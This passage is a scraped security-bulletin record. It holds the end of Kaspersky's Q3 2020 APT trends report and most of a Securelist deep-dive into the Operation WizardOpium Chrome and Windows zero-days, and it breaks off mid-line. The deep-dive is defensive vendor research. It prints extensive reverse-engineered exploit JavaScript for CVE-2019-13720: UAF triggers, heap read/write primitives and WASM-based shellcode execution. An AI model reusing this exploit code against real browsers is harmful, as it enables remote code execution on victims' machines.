additional set of Trojans that we believe are strongly related, as they use the package name mentioned in the downloaders and focus on the same targets. These new samples have strong code similarity with artefacts previously attributed to Origami Elephant.\n\nIn mid-July, we observed a Southeast Asian government organization targeted by an unknown threat actor with a malicious ZIP package containing a multilayered malicious RAR executable package. In one of the incidents, the package was themed around COVID-19 containment. We believe that the same organization was probably the same target of a government web server watering-hole, compromised in early July and serving a highly similar malicious LNK. Much like other campaigns against particular countries that we have seen in the past, these adversaries are taking a long-term, multipronged approach to compromising target systems without utilizing zero-day exploits. Notably, another group (probably OceanLotus) used a similar Telegram delivery technique with its malware implants against the same government targets within a month or so of the COVID-19-themed malicious LNK, in addition to its use of Cobalt Strike.\n\nIn May 2020, Kaspersky technologies prevented an attack using a malicious script for Internet Explorer against a South Korean company. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a Remote Code Execution exploit for Internet Explorer and an Elevation of Privilege exploit for Windows. Unlike a previous full chain that we discovered, used in Operation WizardOpium (you can read more [here ](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>)and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build 18363 x64. On June 8, we reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability CVE-2020-0986 that was used in the zero-day Elevation of Privilege exploit; but before our discovery, the exploitability of this vulnerability had been considered less likely. The patch for CVE-2020-0986 was released on June 9. Microsoft assigned CVE-2020-1380 to a use-after-free vulnerability in JScript and the patch for this was released on August 11. We are calling this and related attacks [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). Currently, we are unable to establish a definitive link with any known threat actor, but due to similarities with previously discovered exploits we believe that DarkHotel may be behind this attack.\n\nOn July 22, we came across a suspicious archive file that was uploaded to VirusTotal from an Italian source. The file seemed to be a triage consisting of malicious scripts, access logs, malicious document files and several screenshots related to suspicious file detections from security solutions. After looking into these malicious document files, we identified that they are related to a Lazarus group campaign that we reported in June. This campaign, dubbed DeathNote, targeted the automobile industry and individuals in the academic field using lure documents containing aerospace and defense-related job descriptions. We are confident that these documents are related to a recently reported attack on an Israeli defense company. We have uncovered webshell scripts, C2 server scripts and malicious documents, identified several victims connected to the compromised C2 server, as well as uncovering the method used to access the C2 server.\n\nWe have observed an ongoing Sidewinder campaign that started in February, using five different malware types. The group made changes to its final payloads and continues to target government, diplomatic and military entities using current themes, such as COVID-19, in its spear-phishing efforts. While the infection mechanism remains the same as before, including the group&#x27;s exploit of choice (CVE-2017-1182) and use of the DotNetToJScript tool to deploy the final payloads, we found that the actor also used ZIP archives containing a Microsoft compiled HTML Help file to download the last-stage payload. In addition to the existing .NET-based implant, which we call SystemApp, the threat actor added JS Orchestrator, the Rover/Scout backdoor and modified versions of AsyncRAT, warzoneRAT to its arsenal.\n\n## Other interesting discoveries\n\nAttribution is difficult at the best of times, and sometimes it&#x27;s not possible at all. While investigating an ongoing campaign, we discovered a new Android implant undergoing development, with no clear link to any previously known Android malware. The malware is able to monitor and steal call logs, SMS, audio, video and non-media files, as well as identifying information about the infected device. It also implements an interesting feature to collect information on network routes and topology obtained using the &quot;traceroute&quot; command as well as using local ARP caches. During this investigation we uncovered a cluster of similar Android infostealer implants, with one example being obfuscated. We also found older Android malware that more closely resembles a backdoor, with traces of it in the wild dating back to August 2019.\n\nIn April, Cisco Talos described the activities of an unknown actor targeting Azerbaijan&#x27;s government and energy sector using new malware called PoetRAT. In collaboration with Kaspersky ICS CERT, we identified supplementary samples of associated malware and documents with broader targeting of multiple universities, government and industrial organizations as well as entities in the energy sector in Azerbaijan. The campaign started in early November 2019; and the attackers switched off the infrastructure immediately following publication of the Cisco Talos report. We observed a small overlap in victimology with Turla, but since there is no technically sound proof of relation between them, and we haven&#x27;t been able to attribute this new set of activity to any other previously known actor, we named it Obsidian Gargoyle.\n\n## Final thoughts\n\nThe TTPs of some threat actors remain fairly consistent over time (such as using hot topics such (COVID-19) to entice users to download and execute malicious attachments sent in spear-phishing emails), while other groups reinvent themselves, developing new toolsets and widening their scope of activities, for example, to include new platforms. And while some threat actors develop [very sophisticated tools](<https://securelist.com/mosaicregressor/98849/>), for example, MosiacRegressor UEFI implant, others [have great success](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) with basic TTPs. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we&#x27;ve seen in Q3 2020:\n\n * Geo-politics continues to drive the development of many APT campaigns, as seen in recent months in the activities of Transparent Tribe, Sidewinder, Origami Elephant and MosaicRegressor, and in the &#x27;naming and shaming&#x27; of various threat actors by the NCSC and the US Department of Justice.\n * Organizations in the financial sector also continue to attract attention: the activities of the mercenary group DeathStalker is a recent example.\n * We continue to observe the use of mobile implants in APT attacks with recent examples including Transparent Tribe and Origami Elephant.\n * While APT threat actors remain active across the globe, recent hotspots of activity have been Southeast Asia, the Middle East and various regions affected by the activities of Chinese-speaking APT groups.\n * Unsurprisingly, we continue to see COVID-19-themed attacks \u2013 this quarter they included WellMess and Sidewinder.\n * Among the most interesting APT campaigns this quarter were DeathStalker and MosaicRegressor: the former underlining the fact that APT groups can achieve their aims without developing highly sophisticated tools; the latter representing the leading-edge in malware development.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "modified": "2020-11-03T10:00:37", "published": "2020-11-03T10:00:37", "id": "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "href": "https://securelist.com/apt-trends-report-q3-2020/99204/", "type": "securelist", "title": "APT trends report Q3 2020", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-29T22:19:56", "bulletinFamily": "blog", "cvelist": ["CVE-2010-2744", "CVE-2016-7255", "CVE-2019-0859", "CVE-2019-13720", "CVE-2019-1458"], "description": "\n\nBack in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. While we've already published blog posts briefly describing this operation (available [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), in this blog post we'd like to take a deep technical dive into the exploits and vulnerabilities used in this attack.\n\n## Google Chrome remote code execution exploit\n\nIn the [original blog post](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) we described the exploit loader responsible for initial validation of the target and execution of the next stage JavaScript code containing the full browser exploit. The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and WebAssembly (WASM) module used in the later stages of exploitation. The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome 76.0.3809.87 and 77.0.3865.75. However, the vulnerability was introduced long before that and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following [commit](<https://chromium.googlesource.com/chromium/src.git/+/6a2e670a243b815cf043f8da4d26ecb9a64d307b>). A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:\n \n \n if (!buffer) {\n +\tBaseAudioContext::GraphAutoLocker context_locker(Context());\n +\tMutexLocker locker(process_lock_);\n \treverb_.reset();\n \tshared_buffer_ = nullptr;\n \treturn;\n\nAs you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy reverb_ and shared_buffer_ objects.\n \n \n class MODULES_EXPORT ConvolverHandler final : public AudioHandler {\n ...\n std::unique_ptr<Reverb> reverb_;\n std::unique_ptr<SharedAudioBuffer> shared_buffer_;\n ...\n\nThese objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.\n\nThe exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the [PartitionAlloc](<https://github.com/scrapy/base-chromium/blob/master/allocator/partition_allocator/PartitionAlloc.md>) memory allocator. This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: SuperPage address, PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of PartitionPage metadata. All constants are taken from [partition_alloc_constants.h](<https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/partition_alloc_constants.h>):\n \n \n function getSuperPageBase(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet superPageBaseMask = ~superPageOffsetMask;\n \tlet superPageBase = addr & superPageBaseMask;\n \treturn superPageBase;\n }\n \n function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet partitionPageBase = partitionPageIndex << BigInt(14);\n \tlet finalAddr = superPageBase + partitionPageBase;\n \treturn finalAddr;\n }\n \n function getPartitionPageIndex(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \treturn partitionPageIndex;\n }\n \n function getMetadataAreaBaseFromPartitionSuperPage(addr) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet systemPageSize = BigInt(0x1000);\n \treturn superPageBase + systemPageSize;\n }\n \n function getPartitionPageMetadataArea(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \tlet pageMetadataSize = BigInt(0x20);\n \tlet partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize;\n \treturn partitionPageMetadataPtr;\n }\n\nIt's interesting that the exploit also uses the relatively new built-in [BigInt](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt>) class to handle 64-bit values; authors usually use their own primitives in exploits.\n\nAt first, the code initiates OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.\n \n \n let gcPreventer = [];\n let iirFilters = [];\n \n function initialSetup() {\n \tlet audioCtx = new OfflineAudioContext(1, 20, 3000);\n \n \tlet feedForward = new Float64Array(2);\n \tlet feedback = new Float64Array(1);\n \n \tfeedback[0] = 1;\n \tfeedForward[0] = 0;\n \tfeedForward[1] = -1;\n \n \tfor (let i = 0; i < 256; i++)\n iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback));\n }\n\nAfter that, the exploit begins the initial stage of exploitation and tries to trigger a UAF bug. For that to work the exploit creates the objects that are needed for the Reverb component. It creates another huge OfflineAudioContext object and two ConvolverNode objects \u2013 ScriptProcessorNode to start audio processing and AudioBuffer for the audio channel.\n \n \n async function triggerUaF(doneCb) {\n \tlet audioCtx = new OfflineAudioContext(2, 0x400000, 48000);\n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \tlet scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1);\n \tlet channelBuffer = audioCtx.createBuffer(1, 1, 48000);\n \n \tconvolver.buffer = channelBuffer;\n \tbufferSource.buffer = channelBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tchannelBuffer.getChannelData(0).fill(0);\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(scriptNode);\n \tscriptNode.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \tscriptNode.onaudioprocess = function(evt) {\n \t\tlet channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer);\n \n \t\tfor (let j = 0; j < channelDataArray.length; j++) {\n \t\tif (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) {\n \t\t\tlet u64Array = new BigUint64Array(1);\n \t\t\tlet u32Array = new Uint32Array(u64Array.buffer);\n \t\t\tu32Array[0] = channelDataArray[j + 0];\n \t\t\tu32Array[1] = channelDataArray[j + 1];\n \n \t\t\tlet leakedAddr = byteSwapBigInt(u64Array[0]);\n \t\t\tif (leakedAddr >> BigInt(32) > BigInt(0x8000))\n \t\t\tleakedAddr -= BigInt(0x800000000000);\n \t\t\tlet superPageBase = getSuperPageBase(leakedAddr);\n \n \t \t\tif (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) {\n \t\t\tfinished = true;\n \t\t\tevt = null;\n \n \t\t\tbufferSource.disconnect();\n \t\t\tscriptNode.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\tsetTimeout(function() {\n \t\t\tdoneCb(leakedAddr);\n \t\t\t}, 1);\n \n \t\t\treturn;\n \t\t\t}\n \t\t}\n \t\t}\n \t};\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (!finished) {\n \t \tfinished = true;\n \t \ttriggerUaF(doneCb);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tconvolver.buffer = null;\n \t\tconvolver.buffer = channelBuffer;\n \t\tawait later(100); // wait 100 millseconds\n \t}\n };\n\nThis function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger a bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:\n \n \n function later(delay) {\n \treturn new Promise(resolve => setTimeout(resolve, delay));\n }\n\nDuring execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes. The existence of such data would mean the UAF was triggered successfully and at this stage the audio channel buffer should contain a leaked pointer.\n\nThe PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when the memory region is freed, it byteswaps the address of the pointer and after that the byteswapped address is added to the FreeList structure. This complicates exploitation because the attempt to dereference such a pointer will crash the process. To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:\n \n \n function byteSwapBigInt(x) {\n \tlet result = BigInt(0);\n \tlet tmp = x;\n \n \tfor (let i = 0; i < 8; i++) {\n \t\tresult = result << BigInt(8);\n \t\tresult += tmp & BigInt(0xFF);\n \t\ttmp = tmp >> BigInt(8);\n \t}\n \n \treturn result;\n }\n\nThe exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class that is passed to the callback function _initialUAFCallback_.\n \n \n let sharedAudioCtx;\n let iirFilterFeedforwardAllocationPtr;\n \n function initialUAFCallback(addr) {\n \tsharedAudioCtx = new OfflineAudioContext(1, 1, 3000);\n \n \tlet partitionPageIndexDelta = undefined;\n \tswitch (majorVersion) {\n \t\tcase 77: // 77.0.3865.75\n \t \tpartitionPageIndexDelta = BigInt(-26);\n \tbreak;\n \t\tcase 76: // 76.0.3809.87\n \t\tpartitionPageIndexDelta = BigInt(-25);\n \t \tbreak;\n \t}\n \n \tiirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0);\n \n triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback);\n }\n\nThe exploit uses the leaked pointer to get the address of the raw pointer to the _feedforward__ array with the AudioArray&lt;double&gt; type that is present in the IIRProcessor object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages and there is a special code inside initialUAFCallback to handle that.\n\nThe vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. This function also executes recursively.\n \n \n let floatArray = new Float32Array(10);\n let audioBufferArray1 = [];\n let audioBufferArray2 = [];\n let imageDataArray = [];\n \n async function triggerSecondUAF(addr, doneCb) {\n \tlet counter = 0;\n \tlet numChannels = 1;\n \n \tlet audioCtx = new OfflineAudioContext(1, 0x100000, 48000);\n \n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \n \tlet bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000);\n \tlet smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000);\n \n \tsmallAudioBuffer.getChannelData(0).fill(0);\n \n \tfor (let i = 0; i < numChannels; i++) {\n \t\tlet channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer);\n \t\tchannelDataArray[0] = addr;\n \t}\n \n \tbufferSource.buffer = bigAudioBuffer;\n \tconvolver.buffer = smallAudioBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (finished) {\n \t\taudioCtx = null;\n \n \t\tsetTimeout(doneCb, 200);\n \t\treturn;\n \t\t} else {\n \t\tfinished = true;\n \n \t\tsetTimeout(function() {\n \t\ttriggerSecondUAF(addr, doneCb);\n \t\t}, 1);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tcounter++;\n \n \t\tconvolver.buffer = null;\n \n \t\tawait later(1); // wait 1 millisecond\n \n \t\tif (finished)\n \t\tbreak;\n \n \t\tfor (let i = 0; i < iirFilters.length; i++) {\n \t\tfloatArray.fill(0);\n \t iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\t\tfinished = true;\n \n \t \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \n \t\t\tbufferSource.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\treturn;\n \t\t}\n \t\t}\n \n \t\tconvolver.buffer = smallAudioBuffer;\n \n \t\tawait later(1); // wait 1 millisecond\n \t}\n }\n\nThis time the exploit uses the function _getFrequencyResponse()_ to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter and the source array for the operation is filled with zeroes.\n \n \n void IIRDSPKernel::GetFrequencyResponse(int n_frequencies,\n \tconst float* frequency_hz,\n \tfloat* mag_response,\n \tfloat* phase_response) {\n ...\n Vector<float> frequency(n_frequencies);\n double nyquist = this->Nyquist();\n // Convert from frequency in Hz to normalized frequency (0 -> 1),\n // with 1 equal to the Nyquist frequency.\n for (int k = 0; k < n_frequencies; ++k)\n \tfrequency[k] = frequency_hz[k] / nyquist;\n ...\n\nIf the resulting array contains a value other than **\u03c0****, **it means exploitation was successful. If that's the case, the exploit stops its recursion and executes the function _finalUAFCallback_ to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap. The exploit also creates BigUint64Array, which is used later to create an arbitrary read/write primitive.\n \n \n async function finalUAFCallback() {\n \tfor (let i = 0; i < 256; i++) {\n \t\tfloatArray.fill(0);\n \n \tiirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\tawait collectGargabe();\n \n \t\taudioBufferArray2 = [];\n \n \t\tfor (let j = 0; j < 80; j++)\n \t\taudioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000));\n \n \t\tiirFilters = new Array(1);\n \t \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < 336; j++)\n \t\t\timageDataArray.push(new ImageData(1, 2));\n \t\timageDataArray = new Array(10);\n \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < audioBufferArray1.length; j++) {\n \t\t\tlet auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer);\n \t\t\tif (auxArray[0] != BigInt(0)) {\n \t\t\tkickPayload(auxArray);\n \t\t\treturn;\n \t\t\t}\n \t\t}\n \n \t\treturn;\n \t\t}\n \t}\n }\n\nHeap defragmentation is performed with multiple calls to the improvised _collectGarbage_ function that creates a huge ArrayBuffer in a loop.\n \n \n function collectGargabe() {\n \tlet promise = new Promise(function(cb) {\n \t\tlet arg;\n \t\tfor (let i = 0; i < 400; i++)\n \t\tnew ArrayBuffer(1024 * 1024 * 60).buffer;\n \t\tcb(arg);\n \t});\n \treturn promise;\n }\n\nAfter those steps, the exploit executes the function _kickPayload()_ passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray's data.\n \n \n async function kickPayload(auxArray) {\n \tlet audioCtx = new OfflineAudioContext(1, 1, 3000);\n \tlet partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0]));\n \tauxArray[0] = byteSwapBigInt(partitionPagePtr);\n \tlet i = 0;\n \tdo {\n \t\tgcPreventer.push(new ArrayBuffer(8));\n \t\tif (++i > 0x100000)\n \t\treturn;\n \t} while (auxArray[0] != BigInt(0));\n \tlet freelist = new BigUint64Array(new ArrayBuffer(8));\n \tgcPreventer.push(freelist);\n \t...\n\nThe exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in BigUint64Array at index zero and if a new 8-byte object is created and the value located at index 0 is read back, then a value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.\n \n \n function read64(rwHelper, addr) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array;\n \ttmp.buffer;\n \tgcPreventer.push(tmp);\n \treturn byteSwapBigInt(rwHelper[0]);\n }\n \n function write64(rwHelper, addr, value) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array(1);\n \ttmp.buffer;\n \ttmp[0] = value;\n \tgcPreventer.push(tmp);\n }\n\nAfter the building of the arbitrary read/write primitives comes the final stage \u2013 executing the code. The exploit achieves this by using a popular technique that exploits the Web Assembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges and this can be used to overwrite them with shellcode. At first, the exploit initiates a \"dummy\" WASM module and it results in the allocation of memory pages for JIT compiled code.\n \n \n const wasmBuffer = new Uint8Array([...]);\n const wasmBlob = new Blob([wasmBuffer], {\n \ttype: \"application/wasm\"\n });\n \n const wasmUrl = URL.createObjectURL(wasmBlob);\n var wasmFuncA = undefined;\n WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) {\n \twasmFuncA = result.instance.exports.a;\n });\n\nTo execute the exported function _wasmFuncA_, the exploit creates a FileReader object. When this object is initiated with data it creates a FileReaderLoader object internally. If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the _getPartitionPageFreeListHeadEntryBySlotSize()_ function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.\n \n \n let fileReader = new FileReader;\n let fileReaderLoaderSize = 0x140;\n let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (!fileReaderLoaderPtr)\n \treturn;\n \n fileReader.readAsArrayBuffer(new Blob([]));\n \n let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (fileReaderLoaderPtr == fileReaderLoaderTestPtr)\n \treturn;\n\nThe exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution. The exploit sets the exported WASM function to be a callback for a FileReader event (in this case, an onerror callback) and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.\n \n \n fileReader.onerror = wasmFuncA;\n \n let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);\n \n let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28));\n let registeredEventListenerPtr = read64(freelist, vectorPtr);\n let eventListenerPtr = read64(freelist, registeredEventListenerPtr);\n let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8));\n let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8));\n \n let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1);\n let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1);\n let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);\n let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1);\n \n let stubAddrFieldOffset = undefined;\n switch (majorVersion) {\n \tcase 77:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(16);\n \tbreak;\n \tcase 76:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(17);\n \tbreak\n }\n \n let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);\n\nThe variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it's sufficient to overwrite it with shellcode. To do so, the exploit uses the function _getPartitionPageFreeListHeadEntryBySlotSize()_ again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object. This object is created when the exploit creates a new audio buffer.\n \n \n let arrayBufferSize = 0x20;\n let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize);\n if (!arrayBufferPtr)\n \treturn;\n \n let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000);\n gcPreventer.push(audioBuffer);\n\nThe exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.\n \n \n let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8));\n \n write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr);\n write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));\n\nNow all that's needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.\n \n \n let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer);\n payloadArray.set(shellcode, 0);\n payloadArray.set(peBinary, shellcode.length);\n\nTo prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.\n \n \n write64(freelist, partitionPagePtr, BigInt(0));\n\nNow, in order to execute the shellcode, it's enough to call the exported WASM function.\n \n \n try {\n \twasmFuncA();\n } catch (e) {}\n\n## Microsoft Windows elevation of privilege exploit\n\nThe shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome's sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That's quite an interesting statistic considering that since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities and the majority of zero-days that we found exploited versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It's also important to note that Google Chrome has a special security feature called [Win32k lockdown](<https://googleprojectzero.blogspot.com/2016/11/breaking-chain.html>). This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it's fair to assume that Operation WizardOpium targeted users running Windows 7.\n\nCVE-2019-1458 is an Arbitrary Pointer Dereference vulnerability. In win32k Window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of tagWND structure is used to distinguish the type of class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. Besides that, in the win32k component there's a syscall SetWindowLongPtr that can be used to set this extra data (after validation of course). It's worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). There's a [common issue](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>) when pre-initialized extra data can lead to system procedures incorrectly handling. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was just insufficient.\n \n \n xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...)\n \t...\n \tif ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) )\n \t\t...\n \t\textraData = (BYTE*)tagWND + sizeof(tagWND) + index\n \t\told = *(QWORD*)extraData;\n \t\t*(QWORD*)extraData = data;\n \t\treturn old;\n\nA check for the index parameter would have prevented this bug, but prior to the patch the values for FNID_DESKTOP, FNID_SWITCH, FNID_TOOLTIPS inside the mpFnid_serverCBWndProc table were not initialized, rendering this check useless and allowing the kernel pointers inside the extra data to be overwritten.\n\nTriggering the bug is quite simple: at first, you create a Window, then NtUserMessageCall can be used to call any system class window procedure.\n \n \n gpsi->mpFnidPfn[(dwType + 6) & 